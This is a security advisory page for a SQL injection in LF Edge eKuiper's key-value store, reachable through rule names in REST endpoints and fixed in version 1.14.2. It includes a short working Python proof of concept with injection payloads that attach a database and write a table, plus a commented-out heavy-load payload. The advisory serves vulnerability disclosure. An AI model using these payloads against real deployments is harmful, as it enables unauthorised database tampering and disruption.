GHSA-r5ph-4jxm-6j9p
Suggest an improvement- Source
- https://github.com/advisories/GHSA-r5ph-4jxm-6j9p
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/08/GHSA-r5ph-4jxm-6j9p/GHSA-r5ph-4jxm-6j9p.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-r5ph-4jxm-6j9p
- Aliases
- Published
- 2024-08-20T20:04:31Z
- Modified
- 2024-08-27T14:31:02.254969Z
- Severity
-
- 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- LF Edge eKuiper has a SQL Injection in sqlKvStore
- Details
-
Summary
A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.
Details
I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.
The SQL injection can happen in the code: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93 The code to accept user input is: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277
The rule id in the above code can be used to exploit SQL query.
Note that the delete function is also vulnerable: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141
PoC
import requests from urllib.parse import quote # SELECT val FROM 'xxx' WHERE key='%s'; payload = f"""'; ATTACH DATABASE 'test93' AS test93; CREATE TABLE test93.pwn (dataz text); INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--""" #payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--" url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain" # explainRuleHandler res = requests.get(url) print(res.content)The screenshot shows the malicious SQL query to insert a value:
The screenshot shows the breakpoint of executing the query:
Impact
SQL Injection vulnerability
The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.
- Database specific
{ "nvd_published_at": "2024-08-20T15:15:24Z", "cwe_ids": [ "CWE-89" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-08-20T20:04:31Z" }- References
-
- https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p
- https://nvd.nist.gov/vuln/detail/CVE-2024-43406
- https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503
- https://github.com/lf-edge/ekuiper
- https://github.com/pypa/advisory-database/tree/main/vulns/ekuiper/PYSEC-2024-72.yaml
Affected packages
Go / github.com/lf-edge/ekuiper
Package
- Name
- github.com/lf-edge/ekuiper
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/lf-edge/ekuiper
PyPI / ekuiper
Package
- Name
- ekuiper
- View open source insights on deps.dev
- Purl
- pkg:pypi/ekuiper
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed1.14.2